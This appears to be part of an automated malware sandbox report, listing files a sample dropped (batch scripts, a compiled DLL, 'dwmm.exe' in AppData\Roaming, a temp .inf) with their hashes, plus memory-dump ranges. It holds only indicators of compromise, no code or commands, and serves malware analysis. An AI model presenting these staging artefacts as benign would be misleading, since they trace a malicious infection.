703461a8bc7f9046c20f97ac212d526e189244aee90200ac8dc77b2ef381044bf8006ce96702279fb590a5cd1638c0d33ea27b69cd02850faa06cdf24f835483

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
e308dff69f54d46f6466bce67d1e1f47

SHA1
bbecf8fb91ab2c9d74c8b0676fe0fbf5f26f6701

SHA256
93d85b09069965ff242fa15bea21b19ddea7993c2e31c449d69ac1858c1782ad

SHA512
dbdeb2da686d9577dbc4df3e998a028600f6743e5220db7989ef97b4caa0ba1818d2516cb4da4869e22d0251853485520f9bc6a16d171619adfe99bd6fcf6bd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
84975192859657648d514b9e970e6690

SHA1
644bd679fbcf09d79598129c14e0bdd3723548f1

SHA256
dfebaab674e9b41a3520a80eb61a12b7dfcbd729f9632c7f3d8d3728983d9302

SHA512
e62f38da73a82b64c51a66eefbab624d2382137ac38d4d02a0fc484fd1df2da97529b39d9c19c6fb9aca42412999df8fd91ec47c6985ded307c0296e022f96ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1a37a2b8974886f332807fa04ced0e44

SHA1
f0f229dbb5ebe3dea1cf00585edd546e4f3ce8ac

SHA256
73ae25872f7f4d288fc8483b9f5275c84ed7b73229532c7808bc37e9243ad33b

SHA512
94b0eacd469cc6817652d5e32f03717cf4bbae4d3bec46c7672426875364852a606bdf98ad18c6e3f4af7b8d485657a4bf91707da4310cf6e3bd71134e490c23

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA066.tmp

Filesize
1KB

MD5
9d932418d9e2b3a8dfa1bd9c7331c62a

SHA1
0dcdaf0b45e0e1ca09538eb7969987e8a540c111

SHA256
346318cdc18e6b9bd542c397f3fd0acbb855f5b9dda3c2c856a3a54ad5203441

SHA512
d937f331420ba0998a56550fd918df3f51abb7390c8b9220d554065573ae2b75cdf68843e33885d0295dcb940ee5eb477e21257652def262c9b24835bc9f8640

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bt5wgxqy.ita.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
45KB

MD5
5e75db78b4eefa9d95b411029918152d

SHA1
1d973f2303effe01afd04f4e2f4cb11eb0ea7880

SHA256
837356ed1c9ccee26cec4e28385becea54f6ce2ed876e16ef788f9572d97befb

SHA512
f3f33476c5a6e1e1941a3e00f458cca79f9cdfba1c1d67f88e1af2d626f3e61cf7bcc8ef21cc9041ecd70e7c393e4f3a5cbcd3f58e0d4dfb08c22682b0f6e1dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\dgp2iyu1\dgp2iyu1.dll

Filesize
4KB

MD5
395133cbf269978c8b00c3a4add73156

SHA1
1878eb849fe5b6f1a21f68dffe1d4123d91ff6e7

SHA256
47723a5e1cc0c76f11d010e4721b272617d458c9eba070a866abbb0e58161d8b

SHA512
0d0ca8d8d886a456111ca1c415ba415bb3742e9e6566b2c4fce49c449683551f1ed9d03ee49473e2ed1567f377d2fc8ff77a722b2349a5060322b202c58c8869

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCA50.tmp.bat

Filesize
148B

MD5
f24c88e3a46d4b5aa0153027055414c9

SHA1
c04262cb12bc4e83dfd9c9369bdb8e280b9486ca

SHA256
c742c93c871f528f0c9a8e83cf2f19bb0082c802625b73452cd992c8df1d0ca8

SHA512
5a537cf922be132555d25ef8259735b25046a36f7f31fb8713c6794c88b5de5d8b2b71a263f1a53e4853cb0892b0472f9d0d0848798bcb60f8308e6e8dd3b72d

Download Submit
C:\Users\Admin\AppData\Roaming\dwmm.exe

Filesize
411KB

MD5
bc4535f575200446e698610c00e1483d

SHA1
78d990d776f078517696a2415375ac9ebdf5d49a

SHA256
88e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122

SHA512
a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717

Download Submit
C:\windows\temp\ortpgyyt.inf

Filesize
683B

MD5
a4fd12b94ad4ac06fabd8dd56dd5ff2b

SHA1
940d129205e04ba31b10a72d7a7a236a9ed0488b

SHA256
fe9977d49d2ae366779da959a5c9a6cc7664bc82d7c8e243f1baa9aa539cd320

SHA512
a4712ad7a23ab7a1eadfdaa7dc73dc406a0a14313c0413561f2f4ba8087c79c504d1d4391585b1b91f580ffef3869a37523707979dd5ab870a596062497e79fe

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dgp2iyu1\CSCD067139C266C44FC95EAB8884E91DAF3.TMP

Filesize
652B

MD5
4ed0270eaeb90e1b0fff9551c15f3fdd

SHA1
b6a6308f0d90e66bb74e118eeb79440054032c39

SHA256
31c3b71e9860ec67c9dfc800c66022f6051e40eab2f514f8c3b7f4cc93636c34

SHA512
c731387dae245758ebd7d3726f0280b89ecb96acfbd6bf6d24327efd2d757798acebcea6311d6a7cc3adffc553f6a8180fab4f8200f256190a3b61fbc2dfae9f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dgp2iyu1\dgp2iyu1.0.cs

Filesize
2KB

MD5
897ac4306f2a2524bc3c441bd00c72b9

SHA1
1703dbf9a2a78491dfd6685540d4691839e33b69

SHA256
a889dd1616631e369d253d6d89cc3a253b663e636bb1cdebbf831817592b405b

SHA512
2eba96a7960fe4c8c083ffbca30dbff4c5aac6acfa2c99b6ab5802376d028cbf471c3f06fcef9a3a0129dc988df1aceba808c3436cd110c123dc2ba1147c81b6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dgp2iyu1\dgp2iyu1.cmdline

Filesize
369B

MD5
1d89a530d55c6968de83b81aeb597d0f

SHA1
853650b20cb115fb635428cf1a899093b2e9af15

SHA256
ea1bca3deae6127fa333a040255c4c236a8f0165bb37e53ac5879567df4f61bb

SHA512
8dc4c0daefaf589f7bfd908043b5a8fc7b8bba1ed1c1ec28b435260c154acfa3e24230985114ccc14991114d3e3518b3d8f82e0a9327e66b27c43d0959026deb

Download Submit
memory/2256-179-0x0000000070960000-0x00000000709AC000-memory.dmp

Filesize
304KB

Download
memory/2768-207-0x0000000005E00000-0x0000000006157000-memory.dmp

Filesize
3.3MB

Download
memory/2968-117-0x0000000070960000-0x00000000709AC000-memory.dmp

Filesize
304KB

Download
memory/3144-105-0x0000000007BE0000-0x0000000007C76000-memory.dmp

Filesize
600KB

Download
memory/3144-92-0x0000000007680000-0x00000000076B4000-memory.dmp

Filesize
208KB

Download
memory/3144-106-0x0000000007B40000-0x0000000007B51000-memory.dmp

Filesize
68KB

Download
memory/3144-104-0x00000000079B0000-0x00000000079BA000-memory.dmp

Filesize
40KB

Download
memory/3144-103-0x00000000076E0000-0x0000000007784000-memory.dmp

Filesize
656KB

Download
memory/3144-102-0x00000000076C0000-0x00000000076DE000-memory.dmp

Filesize
120KB

Download
memory/3144-93-0x0000000070960000-0x00000000709AC000-memory.dmp

Filesize
304KB

Download
memory/3704-67-0x0000000006920000-0x000000000696C000-memory.dmp

Filesize
304KB

Download
memory/3704-66-0x00000000068E0000-0x00000000068FE000-memory.dmp

Filesize
120KB

Download
memory/3704-80-0x0000000007CF0000-0x0000000007D0A000-memory.dmp

Filesize
104KB

Download
memory/3704-81-0x0000000007D20000-0x0000000007D2E000-memory.dmp

Filesize
56KB

Download
memory/3704-53-0x0000000005CF0000-0x000000000631A000-memory.dmp

Filesize
6.2MB

Download
memory/3704-68-0x0000000006E90000-0x0000000006ED6000-memory.dmp

Filesize
280KB

Download
memory/3704-54-0x0000000005A30000-0x0000000005A52000-memory.dmp

Filesize
136KB

Download
memory/3704-79-0x0000000008340000-0x00000000089BA000-memory.dmp

Filesize
6.5MB

Download
memory/3704-65-0x0000000006420000-0x0000000006777000-memory.dmp

Filesize
3.3MB

Download
memory/3704-56-0x0000000005BB0000-0x0000000005C16000-memory.dmp

Filesize
408KB

Download
memory/3704-52-0x00000000030E0000-0x0000000003116000-memory.dmp

Filesize
216KB

Download
memory/3704-55-0x0000000005AD0000-0x0000000005B36000-memory.dmp

Filesize
408KB

Download
memory/3764-190-0x0000000007CF0000-0x0000000007D8C000-memory.dmp

Filesize
624KB

Download
memory/3764-189-0x00000000051A0000-0x00000000051B2000-memory.dmp

Filesize
72KB

Download
memory/4668-168-0x00000000079D0000-0x00000000079E1000-memory.dmp

Filesize
68KB

Download
memory/4668-158-0x0000000070960000-0x00000000709AC000-memory.dmp

Filesize
304KB

Download
memory/4668-167-0x00000000076A0000-0x0000000007744000-memory.dmp

Filesize
656KB

Download
memory/4972-42-0x00007FFF1FA13000-0x00007FFF1FA15000-memory.dmp

Filesize
8KB

Download
memory/4972-43-0x00007FFF1FA10000-0x00007FFF204D2000-memory.dmp

Filesize
10.8MB

Download
memory/4972-26-0x000001B63F8F0000-0x000001B63F8F8000-memory.dmp

Filesize
32KB

Download
memory/4972-13-0x000001B63F8C0000-0x000001B63F8DC000-memory.dmp

Filesize
112KB

Download
memory/4972-47-0x00007FFF1FA10000-0x00007FFF204D2000-memory.dmp

Filesize
10.8MB

Download
memory/4972-0-0x00007FFF1FA13000-0x00007FFF1FA15000-memory.dmp

Filesize
8KB

Download
memory/4972-12-0x00007FFF1FA10000-0x00007FFF204D2000-memory.dmp

Filesize
10.8MB

Download
memory/4972-11-0x00007FFF1FA10000-0x00007FFF204D2000-memory.dmp

Filesize
10.8MB

Download
memory/4972-10-0x00007FFF1FA10000-0x00007FFF204D2000-memory.dmp

Filesize
10.8MB

Download
memory/4972-9-0x000001B63D4B0000-0x000001B63D4D2000-memory.dmp

Filesize
136KB

Download